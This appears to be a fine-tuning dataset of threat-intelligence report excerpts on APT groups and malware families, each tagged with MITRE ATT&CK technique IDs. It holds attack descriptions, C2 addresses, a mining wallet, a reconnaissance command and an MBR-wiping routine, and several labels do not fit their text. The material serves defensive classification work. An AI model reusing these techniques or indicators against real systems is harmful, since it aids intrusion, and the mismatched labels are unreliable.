94Upon exploitation, a GH0ST RAT variant is delivered to the victims’ system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1059 - Command and Scripting Interpreter']fine_tune
95If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us track documents from the same author, as shown in Figure 6['T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
96Each Casbaneiro sample using this method has the buyer’s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer’s ID and downloads and executes the payload['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1105 - Ingress Tool Transfer']fine_tune
97However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool “BBSRAT. Targeting and Infrastructure . As described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook['T1546.015 - Event Triggered Execution: Component Object Model Hijacking']fine_tune
98This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig['T1573.001 - Symmetric Cryptography']fine_tune
99All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers['T1069 - Permission Groups Discovery', 'T1033 - System Owner/User Discovery', 'T1016 - System Network Configuration Discovery']fine_tune
100So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response['T1570 - Lateral Tool Transfer']fine_tune
101Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods['T1105 - Ingress Tool Transfer', 'T1027 - Obfuscated Files or Information']fine_tune
102The link “Check” led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]//fashionableeder[.]com/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind['T1204.001 - Malicious Link']fine_tune
1031) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov['T1082 - System Information Discovery']fine_tune
104Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments['T1095 - Non-Application Layer Protocol']fine_tune
105ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
106The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH/s hashing power and there is 11 XMR (~$1,500) in the wallet['T1496 - Resource Hijacking']fine_tune
107The primary goal of the Dark Halo threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion['T1114.002 - Email Collection: Remote Email Collection']fine_tune
108Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.004 - Command and Scripting Interpreter: Bash']fine_tune
109As with campaigns attributed to the BlackEnergy group, the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don’t have any content with social engineering directing potential victims to click an Enable Content button['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
1101) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant['T1027 - Obfuscated Files or Information']fine_tune
111When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user’s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups['T1003.004 - OS Credential Dumping: LSA Secrets', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
112The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events['T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc']fine_tune
113TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong['T1090.002 - External Proxy']fine_tune
114When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file['T1480 - Execution Guardrails', 'T1083 - File and Directory Discovery', 'T1480 - Execution Guardrails', 'T1480 - Execution Guardrails']fine_tune
115Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating ‘Google Account Recovery’ to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity['T1598.003 - Spearphishing Link']fine_tune
116Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\test.bat ^>c:\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs['T1053.002 - Scheduled Task/Job: At']fine_tune
117BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
118BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center['T1105 - Ingress Tool Transfer']fine_tune
119Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
120TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
1211) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed['T1203 - Exploitation for Client Execution']fine_tune
122This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack['T1070 - Indicator Removal on Host']fine_tune
123In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypt the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext['T1140 - Deobfuscate/Decode Files or Information']fine_tune
124Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1550.003 - Use Alternate Authentication Material: Pass the Ticket', 'T1114.002 - Email Collection: Remote Email Collection', 'T1078 - Valid Accounts']fine_tune
125Computer name - System info using: cmd /c systeminfo >%temp%\temp.ini - List of currently running processes using: cmd /c tasklist >%temp%\temp.ini['T1082 - System Information Discovery']fine_tune
126Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a “.sys” extension['T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
127The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server['T1001.001 - Junk Data']fine_tune
128Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore we have dubbed it “RANCOR”. The Rancor group’s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be a new addition to these attackers’ toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to['T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1105 - Ingress Tool Transfer']fine_tune
129To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string['T1027 - Obfuscated Files or Information']fine_tune
130Some additional log file analysis reveals that a dotm file hosted with a .jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Analysis of the user-agent string belonging to the Israeli IP address, Microsoft+Office+Existence+Discovery, indicates that the dotm file in question was downloaded from within Microsoft Office (template injection['T1480 - Execution Guardrails']fine_tune
1311) It uses the application programming interface (API) CreateFileA to \\.\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with "0x00". The first sector is the disk’s MBR. 3) It will try to perform the routines above (steps 1-2) on \\.\PHYSICALDRIVE1, \\.\PHYSICALDRIVE2, \\.\PHYSICALDRIVE3, and so on, as long as a hard disk is available['T1082 - System Information Discovery']fine_tune
132Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
133This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created['T1204.001 - Malicious Link', 'T1566.001 - Phishing: Spearphishing Attachment']fine_tune
134APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents['T1218.010 - Signed Binary Proxy Execution: Regsvr32']fine_tune
135WastedLocker aims to encrypt the files of the infected host. However, before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking']fine_tune
136Attempted to blend in with a file name that matched the system name it resided on - Configured for WMI persistence (generally uncommon in 2019) - Used likely compromised infrastructure for C2 - Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests['T1071.001 - Application Layer Protocol: Web Protocols', 'T1001 - Data Obfuscation']fine_tune
137In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we’ve seen before, and we’ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network['T1048 - Exfiltration Over Alternative Protocol']fine_tune
138The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server['T1113 - Screen Capture']fine_tune
139At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\ProgramData\Apple\Update\, likely as a ruse['T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1564.001 - Hide Artifacts: Hidden Files and Directories']fine_tune
140On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, it downloads a zip file, unzips it, deletes itself, establishes persistence and restarts the system['T1140 - Deobfuscate/Decode Files or Information', 'T1102.003 - One-Way Communication']fine_tune
141ServHelper’s payload, an NSIS Installer signed with a valid digital signature (further details on the certificate ahead), is downloaded by msiexec.exe to its temporary folder (C:\Windows\Installer\MSI[4-character-string].tmp) and executed['T1218.007 - Signed Binary Proxy Execution: Msiexec']fine_tune
142secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi['T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.003 - OS Credential Dumping: NTDS', 'T1003.001 - OS Credential Dumping: LSASS Memory']fine_tune
143To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast’s acquisition of Piriform on July 18, 2017['T1195.002 - Compromise Software Supply Chain']fine_tune
144These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control['T1082 - System Information Discovery']fine_tune
145This dynamic link library appears to be a legitimate version of libcurl.dll except for a single exported function, which is referred to as ordinal #52 and curl_share_init in the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data included in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the SodomNormal communications module begins running within Libcurl.dll['T1140 - Deobfuscate/Decode Files or Information']fine_tune
146Wscript.exe does a number of things: It deletes the original QakBot.vbs and writes four files to disk in %APPDATA% induce.flac, pep.csv, rhythm.tex and senate.m4a. Senate.m4a is deleted after full process execution['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
147These privilege escalation modules are the ones we caught when we queried for Jian’s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series['T1068 - Exploitation for Privilege Escalation']fine_tune
148First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
149All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1047 - Windows Management Instrumentation']fine_tune
150sifo – Collect victim system information - drive – List drives on victim machine - list – List file information for provided directory - upload – Upload a file to the victim machine - open – Spawn a command shell['T1082 - System Information Discovery', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery', 'T1083 - File and Directory Discovery']fine_tune
151The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_['T1218.011 - Signed Binary Proxy Execution: Rundll32']fine_tune
152Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
153Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
154Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors['T1204.001 - Malicious Link']fine_tune
155The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins['T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account']fine_tune
156The initial routine decrypts selected parts of the code section using XOR with a hardcoded value['T1027 - Obfuscated Files or Information']fine_tune
157A second method consists of using the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary['T1021.002 - Remote Services: SMB/Windows Admin Shares']fine_tune
158It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim['T1027 - Obfuscated Files or Information']fine_tune
159In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of ‘Office of National Security at the Blue House’ to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3['T1586.002 - Email Accounts']fine_tune
160Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the “scheduler” plugin uses it to decompress executable payloads from the C&C['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
161X-Session: 0"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords['T1071.004 - Application Layer Protocol: DNS']fine_tune
162Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method['T1203 - Exploitation for Client Execution']fine_tune
163The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings['T1082 - System Information Discovery']fine_tune
164The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals’ server and isolated the infected systems in the company’s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF['T1014 - Rootkit']fine_tune
165Conficker will copy itself with a random name into the system directory %systemroot%\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms from infecting the machine" (Racicot['T1046 - Network Service Discovery', 'T1112 - Modify Registry']fine_tune
166On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains['T1090.002 - External Proxy', 'T1095 - Non-Application Layer Protocol']fine_tune
167You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
168In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data['T1573.001 - Symmetric Cryptography']fine_tune
169We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns['T1005 - Data from Local System', 'T1566.002 - Phishing: Spearphishing Link', 'T1204.002 - User Execution: Malicious File']fine_tune
170Once the initial computer on the targeted organization’s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials['T1588.002 - Tool', 'T1068 - Exploitation for Privilege Escalation']fine_tune
171The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
172id — the generated unique identifier of the infected host - message — the Base64-encoded output from the newly created cmd.exe console process['T1027 - Obfuscated Files or Information']fine_tune
173The archive contains a legitimate older version of Microsoft Word (Microsoft Word 2007) executable file that is named ‘Noi dung chi tiet don khieu nai gui cong ty.exe’ which translates to ‘Learn more about how to use your company’ in English. The attacker used the DLL side loading technique to load a malicious DLL by the older version of Microsoft Word. When opening the executable file in the archive, it loads the malicious DLL in the same directory. The DLL executes multi-stage shellcodes and each shellcode employs various techniques to hide the next stage['T1574.002 - Hijack Execution Flow: DLL Side-Loading']fine_tune
174Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include['T1105 - Ingress Tool Transfer']fine_tune
175After decoding the PDF and AppleSeed payload, the content gets written into the ProgramData directory. At the end, the decoy PDF file is opened by calling Wscript.Shell.Run and the AppleSeed payload executed through PowerShell by calling regsvr32.exe. Calling regsvr32.exe to run a DLL registers it as a server that automatically calls the DLL export function that has been named DllRegisterServer['T1218.010 - Signed Binary Proxy Execution: Regsvr32']fine_tune
176To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https://www.baomoivietnam[.]com/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (Đang tải) as shown in Figure 1 below['T1598.003 - Spearphishing Link']fine_tune
177In November 2019, when MegaCortex v4 appeared, there was a rollback of sorts, bringing the Base64 key back into play and using it to decrypt the malware’s components. The implementation was not the same as previous versions, with that Base64 key embedded into the binary and then passed to a decrypting function instead of passing it as an argument to the command-line['T1140 - Deobfuscate/Decode Files or Information']fine_tune
178The script sets up a new HTTP object and then tries to disable the system's local proxy settings['T1562.001 - Impair Defenses: Disable or Modify Tools']fine_tune
179Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication than other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key “78563412”. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2['T1082 - System Information Discovery', 'T1071.001 - Application Layer Protocol: Web Protocols', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
180When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the /C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic['T1057 - Process Discovery', 'T1055.012 - Process Injection: Process Hollowing', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1083 - File and Directory Discovery']fine_tune
